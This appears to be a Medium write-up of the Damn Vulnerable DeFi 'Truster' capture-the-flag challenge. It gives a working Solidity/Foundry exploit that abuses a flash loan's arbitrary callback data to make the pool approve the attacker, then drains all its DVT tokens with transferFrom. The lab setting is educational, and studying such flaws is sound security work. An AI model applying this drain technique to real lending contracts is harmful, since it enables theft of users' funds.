Damn Vulnerable DeFi Challenge #3 Solution — Truster

Challenge #3 — Truster

More and more lending pools are offering flash loans. In this case, a new pool has launched that is offering flash loans of DVT tokens for free.

Currently the pool has 1 million DVT tokens in balance. And you have nothing.

But don’t worry, you might be able to take them all from the pool. In a single transaction.

require(address(this).balance >= value, "Address: insufficient balance for call");
require(isContract(target), "Address: call to non-contract");
(bool success, bytes memory returndata) = target.call{value: value}(data);
return verifyCallResult(success, returndata, errorMessage);
function exploit() internal override {
/** CODE YOUR EXPLOIT HERE */
uint256 poolBalance = token.balanceOf(address(pool));// Act as the attacker
vm.prank(attacker);
// make the pool approve the attacker to manage the whole pool balance while taking a free loan
bytes memory attackCallData = abi.encodeWithSignature("approve(address,uint256)", attacker, poolBalance);
pool.flashLoan(0, attacker, address(token), attackCallData);
// now steal all the funds
vm.prank(attacker);
token.transferFrom(address(pool), attacker, poolBalance);
}

Disclaimer

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store